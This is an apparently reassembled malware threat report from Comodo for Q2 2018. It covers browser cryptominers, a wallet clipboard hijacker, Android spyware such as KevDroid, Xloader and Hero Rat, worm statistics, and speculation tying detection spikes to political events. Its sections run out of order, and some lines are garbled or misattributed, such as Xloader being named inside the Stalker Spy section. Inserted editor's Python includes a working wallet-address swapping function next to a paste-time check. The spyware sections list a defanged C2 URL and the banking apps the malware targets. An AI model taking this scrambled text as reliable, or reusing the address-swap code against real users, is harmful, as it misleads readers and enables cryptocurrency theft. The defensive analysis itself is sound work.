This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in only one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007 it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in the infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and new mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.

NORTH AMERICA: Comodo Security Solutions Inc, 1255 Broad Street, Clifton NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772

ASIA: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in

REQUEST A DEMO: To set up a demo or proof-of-concept project, speak with a security consultant at +1 888-266-6361 or visit comodo.com.

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co:

And there we find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any sign of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
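As an added example (editor's code, not Comodo's analysis tooling), the following Python checks a page for exactly the pattern this section describes: an iframe shrunk to 1x1 whose source is the cnhv.co shortener or coinhive.com. The report does not show how the string on the page was obfuscated, so the script assumes a base64 blob handed to document.write and decodes that layer before scanning; the sample page, the shortlink path and the two-domain watchlist are constructed for the example.

```python
"""Find hidden iframes that pull a browser miner in through a URL shortener."""
import base64
import re
from urllib.parse import urlparse

# Assumed watchlist: the two domains named in this section. A real deployment
# would load a maintained list of miner and shortener domains instead.
MINER_DOMAINS = {"cnhv.co", "coinhive.com"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name="quoted" | name='quoted' | name=bare
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Long runs of the base64 alphabet: the assumed obfuscation layer.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_layers(html):
    """Return the page itself plus every base64 blob that decodes to markup."""
    layers = [html]
    for blob in B64_RE.findall(html):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if "<" in text:
            layers.append(text)
    return layers


def parse_attrs(tag):
    """Lower-cased attribute name -> value for one opening tag."""
    attrs = {}
    for name, dq, sq, bare in ATTR_RE.findall(tag):
        attrs[name.lower()] = dq or sq or bare
    return attrs


def is_hidden(attrs):
    """1x1, zero-size, display:none or visibility:hidden iframes count as hidden."""
    def dim(name):
        try:
            return int(attrs.get(name, "100").rstrip("px"))
        except ValueError:
            return 100
    style = attrs.get("style", "").replace(" ", "").lower()
    return (dim("width") <= 1 or dim("height") <= 1
            or "display:none" in style or "visibility:hidden" in style)


def find_hidden_miner_iframes(html):
    """List every hidden iframe, on any decoded layer, whose host is on the watchlist."""
    hits = []
    for layer in decode_layers(html):
        for tag in IFRAME_RE.findall(layer):
            attrs = parse_attrs(tag)
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            if host in MINER_DOMAINS and is_hidden(attrs):
                hits.append({"host": host, "src": src,
                             "width": attrs.get("width"), "height": attrs.get("height")})
    return hits


# Constructed sample page: the iframe is base64-encoded and written by script,
# which is why a glance at view-source shows no miner. The shortlink path is made up.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/1a2b3c" width="1" height="1"></iframe>'
SAMPLE_PAGE = (
    '<html><body><p>Welcome</p><script>document.write(atob("'
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode()
    + '"));</script></body></html>'
)

if __name__ == "__main__":
    for hit in find_hidden_miner_iframes(SAMPLE_PAGE):
        print("hidden miner loader:", hit)
```

The check deliberately keys on two signals together, a watchlisted host and a hidden frame, because a visible cnhv.co link is merely suspicious while a 1x1 frame to it is the loader pattern the report describes.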

The next malware in the row does not mine cryptocurrency but steals it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead steals cryptocurrency outright, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world
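An added example (editor's code, not the malware's or Comodo's) that reproduces the substitution shown above on text and pairs it with the check a wallet or clipboard monitor can run at paste time. The address patterns are shape-only regular expressions with no base58 checksum, so they are triage heuristics; the BTC attacker address is the one from the report's example, while the ETH attacker address and the clipboard contents are constructed for illustration.

```python
"""Clipboard wallet-address substitution, and a paste-time check that catches it."""
import re

# Shape-only patterns: legacy/P2SH/bech32 Bitcoin and hex Ethereum addresses.
# They do not verify checksums, so treat a match as triage, not proof of validity.
ADDRESS_PATTERNS = {
    "btc": re.compile(r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{11,71})\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}

# What the hijacker pastes in. The BTC address is the one in the report's example;
# the ETH one is a constructed placeholder.
ATTACKER_WALLETS = {
    "btc": "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm",
    "eth": "0x" + "ab" * 20,
}


def find_addresses(text):
    """Return (coin, address) pairs in the order they appear in the text."""
    found = []
    for coin, pattern in ADDRESS_PATTERNS.items():
        for m in pattern.finditer(text):
            found.append((m.start(), coin, m.group(0)))
    return [(coin, addr) for _, coin, addr in sorted(found)]


def hijack_clipboard(text, wallets=ATTACKER_WALLETS):
    """Attacker side: swap every address for the attacker's wallet of the same coin."""
    for coin, pattern in ADDRESS_PATTERNS.items():
        text = pattern.sub(wallets[coin], text)
    return text


def paste_guard(copied_text, pasted_text):
    """Defender side: compare what the user copied with what arrives at paste time.
    Returns (coin, expected, actual) for each address that was replaced; an empty
    list means the clipboard round trip was clean."""
    expected = find_addresses(copied_text)
    actual = find_addresses(pasted_text)
    if len(expected) != len(actual):
        return [("count", str(len(expected)), str(len(actual)))]
    return [(coin, e, a) for (coin, e), (_, a) in zip(expected, actual) if e != a]


if __name__ == "__main__":
    copied = "Send 0.5 BTC to 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"  # constructed
    pasted = hijack_clipboard(copied)
    print("pasted :", pasted)
    print("swapped:", paste_guard(copied, pasted))
```

The guard only works if the copy-side text is captured before the malware touches the clipboard, which is why wallet software falls back on a second line of defence: showing the first and last characters of the destination on the confirmation screen so the user can compare them with the source.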

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts (id, name, phone numbers) as well as the owner's email address. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server at http://cgalim[.]com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts the recording and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of dissemination was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and video

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it delivers a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contact details

Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable the Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Disguises of Stalker Spy (app names as listed in the report): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید (Spy Hide tracker), Keylogger, System Service, Mobile Spy, 随意代挂 (game account idling service), Subway Surfers, 라이브성인방송 (live adult broadcast), Мобильный антивирус (Mobile Antivirus), droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배 (CJ Logistics parcel delivery), 余生代挂APP (game account idling app), Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент (mobile client), Asa刷钻 (diamond farming)

In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy

416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo

Disguises of Mystery Bot: version 1, Adobe Flash Player; version 2, Flash Player.

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:


Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈.

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its command and control server:

contacts - get contact details and email ID

Mute - set action to mute

Mms - get MMS content

info - get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert. Version 1: EbookReader, Update Flash Player, Android, Update WhatsApp, Viber. Version 2: Update Google Market, Flash Player, Tactic, FlashLight.

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play Store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Disguises of Hero Rat, version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton,


شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان (disguises of Hero Rat, continued).

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay, version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone.


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in a variety of disguises, listed above.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Disguises of CoinHive. Version 1: Netflix Hack, Instagram Hack. Version 2: TSF Launcher. Version 3: Android Service, PlacarTv Futebol Ao Vivo.

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April 2018.

4.2.2 May 2018

Chart: Android-targeted malware in May 2018.


4.2.3 June 2018

Chart: Android-targeted malware in June 2018.


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

